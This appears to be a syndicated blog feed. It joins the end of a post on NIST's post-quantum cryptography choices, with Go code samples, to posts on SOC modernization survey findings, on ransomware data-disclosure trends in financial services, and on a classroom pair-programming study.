Now that we know how to compare KEMs and Diffie–Hellman, how does Kyber measure up?

Kyber

Kyber is a balanced post-quantum KEM. It is very fast: much faster than X25519, which is already known for its speed. Its main drawback, common to many post-quantum KEMs, is that Kyber has relatively large ciphertext and key sizes: compared to X25519 it adds 1,504 bytes. Is this problematic?
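
That 1,504-byte figure lines up with the round-3 parameter sizes, assuming an 800-byte Kyber512 public key and a 768-byte ciphertext replacing the two 32-byte X25519 public keys:

\[(800 + 768) - (32 + 32) = 1504 \text{ bytes}\]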

We have some indirect data. Back in 2019, together with Google, we tested two post-quantum KEMs, NTRU-HRSS and SIKE, in Chrome. SIKE has very small keys but is computationally very expensive. NTRU-HRSS, on the other hand, has similar performance characteristics to Kyber, but is slightly bigger and slower. This is what we found:

Handshake times for TLS with X25519 (control), NTRU-HRSS (CECPQ2) and SIKE (CECPQ2b). Both post-quantum KEMs were combined with a X25519 key agreement.

In this experiment we used a combination (a hybrid) of the post-quantum KEM and X25519. Thus NTRU-HRSS couldn’t benefit from its speed compared to X25519. Even with this disadvantage, the difference in performance is very small. Thus we expect that switching to a hybrid of Kyber and X25519 will have little performance impact.

So can we switch to post-quantum TLS today? We would love to. However, we have to be a bit careful: some TLS implementations are brittle and crash on the larger KeyShare message that contains the bigger post-quantum keys. We will work hard to find ways to mitigate these issues, as was done to deploy TLS 1.3. Stay tuned!

The other finalists

It’s interesting to have a look at the KEMs that didn’t make the cut. NIST intends to standardize some of these in a fourth round. One reason is to increase the diversity in security assumptions in case there is a breakthrough in attacks on structured lattices on which Kyber is based. Another reason is that some of these schemes have specialized, but very useful applications. Finally, some of these schemes might be standardized outside of NIST.

Structured lattices: NTRU, NTRU Prime, SABER
Backup generalists: BIKE 4️⃣, HQC 4️⃣, FrodoKEM
Specialists: Classic McEliece 4️⃣, SIKE 4️⃣

The finalists and candidates of the third round of the competition. The ones marked with 4️⃣ are proceeding to a fourth round and might yet be standardized.

The structured lattice generalists

Just like Kyber, the KEMs SABER, NTRU and NTRU Prime are all structured lattice schemes that are very similar in performance to Kyber. There are some finer differences, but any one of these KEMs would’ve been a great pick. And they still are: OpenSSH 9.0 chose to implement NTRU Prime.

The backup generalists

BIKE, HQC and FrodoKEM are also balanced KEMs, but they’re based on three different underlying hard problems. Unfortunately they’re noticeably less efficient, both in key sizes and computation. A breakthrough in the cryptanalysis of structured lattices is possible, though, and in that case it’s nice to have backups. Thus NIST is advancing BIKE and HQC to a fourth round.

While NIST chose not to advance FrodoKEM, which is based on unstructured lattices, Germany’s BSI prefers it.

The specialists

The last group of post-quantum cryptographic algorithms under NIST’s consideration are the specialists. We’re happy that both are advancing to the fourth round as they can be of great value in just the right application.

First up is Classic McEliece: it has rather unbalanced performance characteristics with its large public key (261kB) and small ciphertexts (128 bytes). This makes McEliece unsuitable for the ephemeral key exchange of TLS, where we need to transmit the public key. On the other hand, McEliece is ideal when the public key is distributed out-of-band anyway, as is often the case in applications and mobile apps that pin certificates. To use McEliece in this way, we need to change TLS a bit. Normally the server authenticates itself by sending a signature on the handshake. Instead, the client can encrypt a challenge to the KEM public key of the server. Being able to decrypt it is an implicit authentication. This variation of TLS is known as KEMTLS and also works great with Kyber when the public key isn’t known beforehand.

Finally, there is SIKE, which is based on supersingular isogenies. It has very small key and ciphertext sizes. Unfortunately, it is computationally more expensive than the other contenders.

Digital signatures

As we just saw, the situation for post-quantum key agreement isn’t too bad: Kyber, the chosen scheme is somewhat larger, but it offers computational efficiency in return. The situation for post-quantum signatures is worse: none of the schemes fit the bill on their own for different reasons. We discussed these issues at length for ten of them in a deep-dive last year. Let’s restrict ourselves for the moment to the schemes that were most likely to be standardized and compare them against Ed25519 and RSA-2048, the schemes that are in common use today.


Performance characteristics of NIST’s chosen signature schemes compared to Ed25519 and RSA-2048. We compare instances of security level 1, see below. Timings vary considerably by platform and implementation constraints and should be taken as a rough indication only. SPHINCS+ was timed with simple haraka as the underlying hash function. (*) Falcon requires a suitable double-precision floating-point unit for fast signing.

Floating points: Falcon’s Achilles heel

All of these schemes have much larger signatures than those commonly used today. Looking at just these numbers, Falcon is the best of the worst. It, however, has a weakness that this table doesn’t show: it requires fast constant-time double-precision floating-point arithmetic to have acceptable signing performance.

Let’s break that down. Constant time means that the time the operation takes does not depend on the data processed. If the time to create a signature depends on the private key, then the private key can often be recovered by measuring how long it takes to create a signature. Writing constant-time code is hard, but over the years cryptographers have got it figured out for integer arithmetic.
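
Go’s crypto/subtle package gives a feel for what that integer toolbox looks like in practice: comparisons and selections that touch every byte and never branch on secret data. A minimal sketch:

package main

import (
  "crypto/subtle"
  "fmt"
)

func main() {
  expected := []byte("expected MAC value.")
  received := []byte("expected MAC valueX")

  // ConstantTimeCompare inspects every byte regardless of where the first
  // mismatch occurs, so the running time reveals nothing about the secret.
  if subtle.ConstantTimeCompare(expected, received) == 1 {
    fmt.Println("match")
  } else {
    fmt.Println("no match")
  }

  // ConstantTimeSelect returns x if the flag is 1 and y if it is 0,
  // without a data-dependent branch.
  fmt.Println(subtle.ConstantTimeSelect(1, 10, 20)) // prints 10
  fmt.Println(subtle.ConstantTimeSelect(0, 10, 20)) // prints 20
}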

Falcon, crucially, is the first big cryptographic algorithm to use double-precision floating-point arithmetic. Initially it wasn’t clear at all whether Falcon could be implemented in constant-time, but impressively, Falcon was implemented in constant-time for several different CPUs, which required several clever workarounds for certain CPU instructions.

Despite this achievement, Falcon’s constant-timeness is built on shaky grounds. The next generation of Intel CPUs might add an optimization that breaks Falcon’s constant-timeness. Also, many CPUs today do not even have fast constant-time double-precision operations. And then still, there might be an obscure bug that has been overlooked.

In time, the community may figure out how to do constant-time arithmetic on the FPU robustly, but we feel it’s too early to deploy Falcon where the timing of signature minting can be measured. Notwithstanding, Falcon is a great choice for offline signatures such as those in certificates.

Dilithium’s size

This brings us to Dilithium. Compared to Falcon it’s easy to implement safely and has better signing performance to boot. Its signatures and public keys are much larger though, which is problematic. For example, to each browser visiting this very page, we sent six signatures and two public keys. If we’d replace them all with Dilithium2 we would be looking at 17kB of additional data. Last year, we ran an experiment to see the impact of additional data in the TLS handshake:

Impact of larger signatures on TLS handshake time. For the details, see this blog.

There are some caveats to point out: first, we used a big 30-segment initial congestion window (icwnd). With a normal icwnd, the bump at 40KB moves to 10KB. Secondly, the height of this bump is the round-trip time (RTT), which, due to our broadly distributed network, is very low for us. Thus, switching to Dilithium alone might well double your TLS handshake times. More disturbingly, we saw that some connections stopped working when we added too much data:

Amount of failed TLS handshakes by size of added signatures. For the details, see this blog.

We expect this was caused by misbehaving middleboxes. Taken together, we concluded that early adoption of post-quantum signatures on the Internet would likely be more successful if those six signatures and two public keys would fit in 9KB. This can be achieved by using Dilithium for the handshake signature and Falcon for the other (offline) signatures.
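
As a rough sanity check of that 9KB budget, here is a back-of-the-envelope estimate. It assumes the round-3 sizes (Dilithium2: 1,312-byte public key and 2,420-byte signature; Falcon-512: 897-byte public key and roughly 666-byte signatures) and a hypothetical split of one online Dilithium2 signature plus public key and five offline Falcon signatures plus one Falcon public key; the exact mix in a real handshake will differ.

\[(2420 + 1312) + (5 \times 666 + 897) = 7959 \text{ bytes} \approx 7.8\,\text{kB} < 9\,\text{kB}\]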

At most one of Dilithium or Falcon

Unfortunately, NIST stated on several occasions that it would choose only two signature schemes, but not both Falcon and Dilithium:

Slides of NIST’s status update after the conclusion of round 2

The reason given is that both Dilithium and Falcon are based on structured lattices and thus do not add more security diversity. Because of the difficulty of implementing Falcon correctly, we expected NIST to standardize Dilithium and, as a backup, SPHINCS+. With that guess, we saw a big challenge ahead: to keep the Internet fast, we would need some difficult and rigorous changes to the protocols.

The twist

However, to everyone’s surprise, NIST picked both! NIST chose to standardize Dilithium, Falcon and SPHINCS+. This is a very pleasant surprise for the Internet: it means that post-quantum authentication will be much simpler to adopt.

SPHINCS+, the conservative choice

In the excitement of the fight between Dilithium and Falcon, we could almost forget about SPHINCS+, a stateless hash-based signature. Its big advantage is that its security is based on the second-preimage resistance of the underlying hash-function, which is well understood. It is not a stretch to say that SPHINCS+ is the most conservative choice for a signature scheme, post-quantum or otherwise. But even as a co-submitter of SPHINCS+, I have to admit that its performance isn’t that great.

There is a lot of flexibility in the parameter choices for SPHINCS+: there are tradeoffs between signature size, signing time, verification time and the maximum number of signatures that can be minted. Of the current parameter sets, the “s” are optimized for size and “f” for signing speed; both are chosen to allow 2⁶⁴ signatures. NIST has hinted at reducing the signature limit, which would improve performance. A custom choice of parameters for a particular application would improve it even more, but would still trail Dilithium.

Having discussed NIST choices, let’s have a look at those that were left out.

The other finalists

There were three other finalists: GeMSS, Picnic and Rainbow. None of these are progressing to a fourth round.

Picnic is a conservative choice similar to SPHINCS+. Its construction is interesting: it is based on the secure multiparty computation of a block cipher. To be efficient, a non-standard block cipher is chosen. This makes Picnic’s assumptions a bit less conservative, which is why NIST preferred SPHINCS+.

GeMSS and Rainbow are specialists: they have large public key sizes (hundreds of kilobytes), but very small signatures (33–66 bytes). They would be great for applications where the public key can be distributed out of band, such as for the Signed Certificate Timestamps included in certificates for Certificate Transparency. Unfortunately, both turned out to be broken.

Signature schemes on the horizon

Although we expect Falcon and Dilithium to be practical for the Internet, there is ample room for improvement. Many new signature schemes have been proposed after the start of the competition, which could help out a lot. NIST recognizes this and is opening a new competition for post-quantum signature schemes.

A few schemes that have caught our eye already are UOV, which has similar performance trade-offs to those for GeMSS and Rainbow; SQISign, which has small signatures, but is computationally expensive; and MAYO, which looks like it might be a great general-purpose signature scheme.

Stateful hash-based signatures

Finally, we’d be remiss not to mention the post-quantum signature schemes that have already been standardized by NIST: the stateful hash-based signature schemes LMS and XMSS. They share the same conservative security as their sibling SPHINCS+, but have much better performance. The rub is that for each keypair there is a finite number of signature slots, and each slot can only be used once: if it’s used twice, the scheme becomes insecure. This is why they are called stateful: the signer must remember which slots have been used in the past, and any mistake is fatal. Keeping this state perfectly can be very challenging.
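
To give a feel for what that bookkeeping involves, here is a minimal, hypothetical sketch of the reserve-before-sign discipline: the next leaf index is persisted before it is handed out, so a crash can at worst waste a slot but never reuse one. Real deployments also need atomic writes, fsync, and a plan for backups and replication; none of that is shown here, and the file name and helper are made up for illustration.

package main

import (
  "encoding/binary"
  "errors"
  "fmt"
  "os"
)

// reserveLeaf records that the next leaf index is taken *before* returning it,
// so the same slot can never be handed out twice, even after a crash.
func reserveLeaf(path string, maxLeaves uint64) (uint64, error) {
  var next uint64
  if buf, err := os.ReadFile(path); err == nil && len(buf) == 8 {
    next = binary.BigEndian.Uint64(buf)
  }
  if next >= maxLeaves {
    return 0, errors.New("key exhausted: no signature slots left")
  }
  var buf [8]byte
  binary.BigEndian.PutUint64(buf[:], next+1) // persist the reservation first
  if err := os.WriteFile(path, buf[:], 0o600); err != nil {
    return 0, err // if we cannot record the reservation, we must not sign
  }
  return next, nil
}

func main() {
  leaf, err := reserveLeaf("xmss.state", 1<<10)
  if err != nil {
    fmt.Println("refusing to sign:", err)
    return
  }
  fmt.Println("safe to sign with leaf index", leaf)
  // ... the actual XMSS/LMS signing call would use this leaf exactly once.
}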

What else

What’s next?

NIST will draft standards for the selected schemes and request public feedback on them. There might be changes to the algorithms, but we do not expect anything major. The standards are expected to be finalized in 2024.

In the coming months, many languages, libraries and protocols will already add preliminary support for the current version of Kyber and the other post-quantum algorithms. We’re helping out to make post-quantum available to the Internet as soon as possible: we’re working within the IETF to add Kyber to TLS and will contribute upstream support to popular open-source libraries.

Start experimenting with Kyber today

Now is a good time for you to try out Kyber in your software stacks. We were lucky to correctly guess Kyber would be picked and have experience running it internally. Our tests so far show it performs great. Your requirements might differ, so try it out yourself.

The reference implementation in C is excellent. The Open Quantum Safe project integrates it with various TLS libraries, but beware: the algorithm identifiers and scheme might still change, so be ready to migrate.

Our CIRCL library has a fast independent implementation of Kyber in Go. We implemented Kyber ourselves so that we could help tease out any implementation bugs or subtle underspecification.

Experimenting with post-quantum signatures

Post-quantum signatures are not as urgent, but might require more engineering to get right. First off, which signature scheme to pick?

  • Are large signatures and slow operations acceptable? Go for SPHINCS+.
  • Do you need more performance?
    • Can your signature generation be timed, for instance when generated on-the-fly? Then go for (a hybrid, see below, with) Dilithium.
    • For offline signatures, go for (a hybrid with) Falcon.
  • If you can keep a state perfectly, check out XMSS/LMS.

Open Quantum Safe can be used to test these out. Our CIRCL library also has a fast independent implementation of Dilithium in Go. We’ll add Falcon and SPHINCS+ soon.

Hybrids

A hybrid is a combination of a classical and a post-quantum scheme. For instance, we can combine Kyber512 with X25519 to create a single Kyber512X key agreement. The advantage of a hybrid is that the data remains secure against non-quantum attackers even if Kyber512 turns out broken. It is important to note that it’s not just about the algorithm, but also the implementation: Kyber512 might be perfectly secure, but an implementation might leak via side-channels. The downside is that two key-exchanges are performed, which takes more CPU cycles and bytes on the wire. For the moment, we prefer sticking with hybrids, but we will revisit this soon.
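
To illustrate the combining step, here is a minimal sketch (not the actual Kyber512X construction, whose exact KDF, labels, and ordering are defined elsewhere): run both key agreements, then feed both shared secrets plus the handshake transcript into HKDF, so the result stays secret as long as either input does.

package main

import (
  "crypto/sha256"
  "fmt"
  "io"

  "golang.org/x/crypto/hkdf"
)

// combineSecrets derives a single session key from a classical and a
// post-quantum shared secret. If either input stays secret, so does the output.
func combineSecrets(classical, postQuantum, transcript []byte) ([]byte, error) {
  ikm := append(append([]byte{}, classical...), postQuantum...)
  kdf := hkdf.New(sha256.New, ikm, nil /* no salt */, transcript)
  key := make([]byte, 32)
  if _, err := io.ReadFull(kdf, key); err != nil {
    return nil, err
  }
  return key, nil
}

func main() {
  key, err := combineSecrets(
    []byte("x25519-shared-secret-placeholder"),
    []byte("kyber512-shared-secret-placeholder"),
    []byte("handshake-transcript-placeholder"),
  )
  if err != nil {
    panic(err)
  }
  fmt.Printf("derived %d-byte session key: %x...\n", len(key), key[:4])
}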

Post-quantum security levels

Each algorithm has different parameters targeting various post-quantum security levels. Up till now, we’ve only discussed the performance characteristics of security level 1 (or 2 in the case of Dilithium, which doesn’t have level 1 parameters). The definition of the security levels is rather interesting: they’re defined as being as hard to crack by a classical or quantum attacker as specific instances of AES and SHA:

Level Definition: at least as hard to break as …
1 To recover the key of AES-128 by exhaustive search
2 To find a collision in SHA256 by exhaustive search
3 To recover the key of AES-192 by exhaustive search
4 To find a collision in SHA384 by exhaustive search
5 To recover the key of AES-256 by exhaustive search

So which security level should we pick? Is level 1 good enough? We’d need to understand how hard it is for a quantum computer to crack AES-128.

Grover’s algorithm

In 1996, two years after Shor’s paper, Lov Grover published his quantum search algorithm. With it, you can find the AES-128 key (given known plain and ciphertext) with only 2⁶⁴ executions of the cipher in superposition. That sounds much faster than the 2¹²⁷ tries on average for a classical brute-force attempt. In fact, it sounds like security level 1 isn’t that secure at all. Don’t be alarmed: level 1 is much more secure than it sounds, but it requires some context.

To start, a classical brute-force attempt can be parallelized — millions of machines can participate, sharing the work. Grover’s algorithm, on the other hand, doesn’t parallelize well, because the quadratic speedup only applies to the share of the search each machine performs. To wit, a billion quantum computers would still have to do 2⁴⁹ iterations each to crack AES-128.
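
As a back-of-the-envelope check, assuming Grover’s quadratic speedup and ignoring constant factors, splitting a key space of N = 2¹²⁸ over M ≈ 2³⁰ (a billion) machines still costs each machine

\[\sqrt{N/M} = \sqrt{2^{128}/2^{30}} = \sqrt{2^{98}} = 2^{49} \text{ iterations.}\]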

Then each iteration requires many gates. It’s estimated that these 2⁴⁹ operations take roughly 2⁶⁴ noiseless quantum gates. If each of our billion quantum computers could execute a billion noiseless quantum gates per second, then it’d still take 500 years.

That already sounds more secure, but we’re not done. Quantum computers do not execute noiseless quantum gates: they’re analogue machines, and every operation has a little bit of noise. Does this mean that quantum computing is hopeless? Not at all! There are clever algorithms to turn, say, a million noisy qubits into one less noisy qubit. This error correction doesn’t just add qubits; it also adds extra gates. How much depends very much on the exact details of the quantum computer.

It is not inconceivable that in the future there will be quantum computers that effectively execute far more than a billion noiseless gates per second, but it will likely be decades after Shor’s algorithm is practical. This all is a long-winded way of saying that security level 1 seems solid for the foreseeable future.

Hedging against attacks

A different reason to pick a higher security level is to hedge against better attacks on the algorithm. This makes a lot of sense, but it is important to note that this isn’t a foolproof strategy:

  • Not all attacks are small improvements. It’s possible that improvements in cryptanalysis break all security levels at once.
  • Higher security levels do not protect against implementation flaws, such as (new) timing vulnerabilities.

A different aspect, arguably more important than picking a high number, is crypto agility: being able to switch to a new algorithm or implementation in case of a break or other trouble. Let’s hope that we will not need it, but since we’re switching anyway, now is a good time to make future transitions easier.

CIRCL is Post-Quantum Enabled

We already mentioned CIRCL a few times: it’s our optimized crypto library for Go, whose development we started in 2019. CIRCL already contains support for several post-quantum algorithms, such as the KEMs Kyber, SIKE, and FrodoKEM, and the signature scheme Dilithium. The code is up to date and compliant with test vectors from the third round. CIRCL is readily usable in Go programs either as a library or natively as part of Go using this fork.


One goal of CIRCL is to enable experimentation with post-quantum algorithms in TLS. For instance, we ran a measurement study to evaluate the feasibility of the KEMTLS protocol for which we’ve adapted the TLS package of the Go library.

As an example, this code uses CIRCL to sign a message with eddilithium2, a hybrid signature scheme pairing Ed25519 with Dilithium mode 2.

package main

import (
  "crypto"
  "crypto/rand"
  "fmt"

  "github.com/cloudflare/circl/sign/eddilithium2"
)

func main() {
  // Generating random keypair.
  pk, sk, err := eddilithium2.GenerateKey(rand.Reader)

  // Signing a message.
  msg := []byte("Signed with CIRCL using " + eddilithium2.Scheme().Name())
  signature, err := sk.Sign(rand.Reader, msg, crypto.Hash(0))

  // Verifying signature.
  valid := eddilithium2.Verify(pk, msg, signature[:])

  fmt.Printf("Message: %v\n", string(msg))
  fmt.Printf("Signature (%v bytes): %x...\n", len(signature), signature[:4])
  fmt.Printf("Signature Valid: %v\n", valid)
  fmt.Printf("Errors: %v\n", err)
}
Message: Signed with CIRCL using Ed25519-Dilithium2
Signature (2484 bytes): 84d6882a...
Signature Valid: true
Errors: <nil>

As can be seen, the application programming interface is the same as the crypto.Signer interface from the standard library. Try it out; we’re happy to hear your feedback.
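
That compatibility means the key can be handed to code written purely against the standard library. The small sketch below assumes that *eddilithium2.PrivateKey satisfies crypto.Signer (it exposes Sign with the standard shape, as used above); if that assumption doesn’t hold in your CIRCL version, a thin wrapper is needed.

package main

import (
  "crypto"
  "crypto/rand"
  "fmt"

  "github.com/cloudflare/circl/sign/eddilithium2"
)

// signWith only knows about the standard crypto.Signer interface, yet works
// with the hybrid Ed25519-Dilithium2 key because the key implements it.
func signWith(signer crypto.Signer, msg []byte) ([]byte, error) {
  return signer.Sign(rand.Reader, msg, crypto.Hash(0))
}

func main() {
  _, sk, err := eddilithium2.GenerateKey(rand.Reader)
  if err != nil {
    panic(err)
  }
  sig, err := signWith(sk, []byte("hello, post-quantum"))
  if err != nil {
    panic(err)
  }
  fmt.Printf("signature length: %d bytes\n", len(sig))
}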

Conclusion

This is a big moment for the Internet. From a set of excellent options for post-quantum key agreement, NIST chose Kyber. With it, we can secure the data on the Internet today against quantum adversaries of the future, without compromising on performance.

On the authentication side, NIST pleasantly surprised us by choosing both Falcon and Dilithium, contrary to their earlier statements. This was a great choice, as it will make post-quantum authentication more practical than we expected it would be.

Together with the cryptography community, we have our work cut out for us: we aim to make the Internet post-quantum secure as fast as possible.

Want to follow along? Keep an eye on this blog or have a look at research.cloudflare.com.

Want to help out? We’re hiring and open to research visits.

Today’s SOC Strategies Will Soon Be Inadequate

Post Syndicated from Dina Durutlic original https://blog.rapid7.com/2022/07/08/todays-soc-strategies-will-soon-be-inadequate/

Today’s SOC Strategies Will Soon Be Inadequate

New research sponsored by Rapid7 explores the momentum behind security operations center (SOC) modernization and the role extended detection and response (XDR) plays. ESG surveyed over 370 IT and cybersecurity professionals in the US and Canada – responsible for evaluating, purchasing, and utilizing threat detection and response security products and services – and identified key trends in the space.

The first major finding won’t surprise you: Security operations remain challenging.

Cybersecurity is dynamic

A growing attack surface, the volume and complexity of security alerts, and public cloud proliferation add to the intricacy of security operations today. Attacks increased 31% from 2020 to 2021, according to Accenture’s State of Cybersecurity Resilience 2021 report. The number of attacks per company increased from 206 to 270 year over year. The disruptions will continue, ultimately making many current SOC strategies inadequate if teams don’t evolve from reactive to proactive.

In parallel, many organizations are facing tremendous challenges closer to home due to a lack of skilled resources. At the end of 2021, there was a security workforce gap of 377,000 jobs in the US and 2.7 million globally, according to the (ISC)2 Cybersecurity Workforce Study. Already-lean teams are experiencing increased workloads, often resulting in burnout or churn.

Key findings on the state of the SOC

In the new ebook, SOC Modernization and the Role of XDR, you’ll learn more about the increasing difficulty in security operations, as well as the other key findings, which include:

  • Security professionals want more data and better detection rules – Despite the massive amount of security data collected, respondents want more scope and diversity.
  • SecOps process automation investments are proving valuable – Many organizations have realized benefits from security process automation, but challenges persist.
  • XDR momentum continues to build – XDR awareness continues to grow, though most see XDR supplementing or consolidating SOC technologies.
  • MDR is mainstream and expanding – Organizations need help from service providers for security operations; 85% use managed services for a portion or a majority of their security operations.

Download the full report to learn more.


For Finserv Ransomware Attacks, Obtaining Customer Data Is the Focus

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/07/07/for-finserv-ransomware-attacks-obtaining-customer-data-is-the-focus/

For Finserv Ransomware Attacks, Obtaining Customer Data Is the Focus

Welcome back to the third installment of Rapid7’s Pain Points: Ransomware Data Disclosure Trends blog series, where we’re distilling the key highlights of our ransomware data disclosure research paper one industry at a time. This week, we’ll be focusing on the financial services industry, one of the most highly regulated — and frequently attacked — industries we looked at.

Rapid7’s threat intelligence platform (TIP) scans the clear, deep, and dark web for data on threats, and operationalizes that data automatically with our Threat Command product. We used that data to conduct unique research into the types of data threat actors disclose about their victims. The data points in this research come from the threat actors themselves, making it a rare glimpse into their actions, motivations, and preferences.

Last week, we discussed how the healthcare and pharmaceutical industries are particularly impacted by double extortion in ransomware. We found that threat actors target and release specific types of data to coerce victims into paying the ransom. In this case, it was internal financial information (71%), which was somewhat surprising, considering financial information is not the focus of these two industries. Less surprising, but certainly not less impactful, were the disclosure of customer or patient information (58%) and the unusually strong emphasis on intellectual property in the pharmaceuticals sector of this vertical (43%).

Customer data is the prime target for finserv ransomware

But when we looked at financial services, something interesting did stand out: Customer data was found in the overwhelming majority of data disclosures (82%), not necessarily the company’s internal financial information. It seems threat actors were more interested in leveraging the public’s implied trust in financial services companies to keep their personal financial information private than they were in exposing the company’s own financial information.

Since much of the damage done by ransomware attacks — or really any cybersecurity incident — lies in the erosion of trust in that institution, it appears threat actors are seeking to hasten that erosion with their initial data disclosures. The financial services industry is one of the most highly regulated industries in the market entirely because it holds the financial health of millions of people in its hands. Breaches at these institutions tend to have outsized impacts.

Employee info is also at risk

The next most commonly disclosed form of data in the financial services industry was personally identifiable information (PII) and HR data. This is personal data of those who work in the financial industry and can include identifying information like Social Security numbers and the like. Some 59% of disclosures from this sector included this kind of information.

This appears to indicate that threat actors want to undermine the company’s ability to keep their own employees’ data safe, and that can be corroborated by another data point: In some 29% of cases, data disclosure pointed to reconnaissance for future IT attacks as the motive. Threat actors want financial services companies and their employees to know that they are and will always be a major target. Other criminals can use information from these disclosures, such as credentials and network maps, to facilitate future attacks.

As with the healthcare and pharmaceutical sectors, our data showed some interesting and unique motivations from threat actors, as well as confirmed some suspicions we already had about why they choose the data they choose to disclose. Next time, we’ll be taking a look at some of the threat actors themselves and the ways they’ve impacted the overall ransomware “market” over the last two years.


A pair programming approach for engaging girls in the Computing classroom: Study results

Post Syndicated from Katharine Childs original https://www.raspberrypi.org/blog/gender-balance-in-computing-pair-programming-approach-engaging-girls/

Today we share the second report in our series of findings from the Gender Balance in Computing research programme, which we’ve been running as part of the National Centre for Computing Education and with various partners. In this £2.4 million research programme, funded by the Department for Education in England, we aim to identify ways to encourage more female learners to engage with Computing and choose to study it further.

A teacher encourages a learner in the computing classroom.

Previously, we shared the evaluation report about our pilot study of using a storytelling approach with very young computing learners. This new report, again coming from the Behavioural Insights Team (BIT) which acts as the programme’s independent evaluator, describes our study of another teaching approach.

Existing research suggests that computing is not always taught in a way that is engaging for girls in particular [1], and that we can improve this. With the intervention at hand, we wanted to explore the effects of using a pair programming teaching approach with primary school learners aged 8 to 11. We have critically and carefully examined the findings, which show mixed outcomes regarding the effectiveness of the approach, and we believe that the research provides insights that increase our shared understanding of how to teach computing effectively to young learners. 

Computing education through a collaborative lens

Many people think that writing computer programs is a task carried out by people working individually. A 2017 study of 8- and 9-year-olds [2] confirms this: when asked to draw a picture of a computer scientist doing work, 90% of the children drew a picture of one person working alone. This stereotype is present in teaching and learning about computing and computer science; many computer programming lessons take place in a way that promotes solitary working, with individual students sitting in front of separate computers, working on their own code and debugging their own errors.

A girl codes at a laptop while a woman looks on during a Code Club session.

Professional software development rarely happens like this. For example, at the Raspberry Pi Foundation, our software engineers work collaboratively on design and often pair up to solve problems. Computing education research also has identified the importance of looking at computer programming through a collaborative lens. This viewpoint allows us to see computing as a subject with scope for collaborative group work in which students create useful applications together and are part of a community where programming has a shared social context [3]. 

Researching collaborative learning in the primary computing classroom 

One teaching approach in computing that promotes collaborative learning is pair programming (a practice also used in industry). This is a structured way of working on programming tasks  where learners are paired up and take turns acting as the driver or the navigator. The driver controls the keyboard and mouse and types the code. The navigator reads the instructions, supports the driver by watching out for errors in the code, and thinks strategically about next steps and solutions to problems. Learners swap roles every 5 to 10 minutes, to ensure that both partners can contribute equally and actively to the collaborative learning.

Two female learners code at a computer together.

As one part of the Gender Balance in Computing programme, we designed a project to explore the effect of pair programming on girls’ attitudes towards computing. This project builds on research from the USA which suggests that solving problems collaboratively increases girls’ persistence when they encounter difficulties in programming tasks [4].

In the Pair Programming project, we worked with teachers of Year 4 (ages 8–9) and Year 6 (ages 10–11) in schools in England. From January to March 2020, we ran a pilot study with 10 schools and used the resulting teacher feedback to finalise the training and teaching materials for a full randomised controlled trial.

A tweet from a school about taking part in the pair programming intervention of the Gender Balance in Computing research programme.
A tweet from a school about taking part in the pair programming study.

The randomised controlled trial ran from September to December 2021 with 97 schools. Schools were randomly allocated either to the intervention group, which used the pair programming training and the scheme of work we designed, or to the control group, which taught Computing in its usual way, unaware that we were investigating the effects of pair programming. Due to the coronavirus pandemic, our training of teachers in the pair programming approach had to take place via an online course instead of face to face.

Teachers in both groups delivered 12 weeks of Computing lessons, in which learners used Scratch programming to draw shapes and create animations. The lessons covered computing concepts from Key Stage 2 (ages 7–11), such as using sequences, selection, and repetition in programs, as well as digital literacy skills such as using technology respectfully.

What can we learn about pair programming from the study? 

The findings about this particular intervention were limited by the amount of data the independent evaluators at BIT were able to collect from learners and teachers, given the ongoing pandemic. BIT’s evaluation was primarily based on quantitative data collected from learners at the start and the end of the intervention. To collect the data, they used a validated instrument called the Student Computer Science Attitude Survey (SCSAS), which asks learners about their attitudes towards Computing. The evaluators compared the datasets gathered from the intervention group (who took part in pair programming lessons) and the control group (who took part in Computing lessons taught with a ‘business as usual’ model).

A teacher watches two female learners code in Code Club session in the classroom.

The evaluators’ data analysis found no statistically significant evidence that the pair programming approach positively affected girls’ attitudes towards computing or their intention to study computing in the future. The lack of statistically significant results, called a null result in research projects, can appear disappointing at first. But our work involves careful reflection and critical thinking about all outcomes of our research, and the result of this project is no exception. These are factors that may have contributed towards the result: 

  • The independent evaluators suggested that the intervention may lead to different findings if it were implemented again without the disruptions caused by the pandemic. One of their recommendations was to revert to our original planned model of providing face-to-face training to teachers delivering the pair programming approach, and we believe this would embed a deeper understanding of the approach. 
  • Our research built upon a prior study [4] that suggested a connection between pair programming and increased confidence about problem-solving in girls of a similar age. That study took place in a non-formal setting in an all-girls group, whereas our research was situated in formal education in mixed gender groups. It may be that these differences are significant. 
  • It may be that there is no causal link between using the pair programming approach and an increase in girls’ attitudes towards computing, or that the link may only become apparent over a longer time-scale, or that the pair programming approach needs to be combined with other strategies to achieve a positive effect. 

The evaluators also gathered qualitative data by running teacher and learner interviews, and we were pleased that this data provided some rich insights into the benefits of using a pair programming approach in the primary classroom, and gave some promising indications of possible benefits for female learners in particular. 

  1. Teachers spoke positively about the use of paired activities, and felt that having the defined roles of driver and navigator helped both partners to contribute equally to the programming tasks. Learners said that they enjoyed working in pairs, even though there could be some moments of frustration. Some of the teachers were even planning to integrate pair programming into future lessons. This suggests that the approach was effective both in engaging and motivating learners and in facilitating the planned learning outcomes of the lessons, and that it can be used more widely in primary computing teaching.

“I don’t know why I’ve never thought to do computing like that, actually, because it’s a really good vehicle for the fact that there are two roles, clearly defined. There’s all your conversation, and knowledge comes through that, and then they’re both equally having a turn.” — Primary school teacher (report, p. 38)

“I like working with both [both as a partner and by yourself] because when you do pair programming, you’re collaborating with your partner, making links, and you have to tell them what to do. But if you have a really good idea and then they put the wrong thing in the wrong place, it’s quite annoying.” — Female learner (report, p. 40)

  2. Both teachers and learners felt that having the support of a partner boosted learners’ confidence, which echoes previous research in the field [5, 6]. In computing, boys more accurately assess their capabilities, whereas girls tend to underestimate their performance [7]. A positive feeling such as confidence towards a subject, combined with a belief that one can succeed in tasks related to that subject, is known as self-efficacy [8]. Our findings suggest that, through the use of the pair programming approach, both boys and girls improved their sense of self-efficacy towards Computing, which is corroborated by quotes from the learners themselves. This is interesting because a sense of self-efficacy in Computing is linked to decisions to pursue further study in the subject [9]. More research could build on this observation.

“I do think that having that equal time to have a go at both, thinking of the girls I’ve got, will have helped my girls, because they lack a bit of confidence. They were learning very quickly that, ‘Actually, yes, we are sure. We can do this.’” — Primary teacher (report, p. 44)

“It might be easier to do pair programming [compared to ‘normal’ lessons] because if you’re stuck, your partner can be helpful.” — Female learner (report, p. 43)

Find out more about pair programming 

  • Download our Big Book of Computing Pedagogy as a free PDF and read about pair programming on pages 58 and 59.
  • Watch this short video that shows pair programming being used in a primary classroom. 
  • Read the evaluation report of the pair programming intervention, where you’ll also find more quotes from teachers and learners.
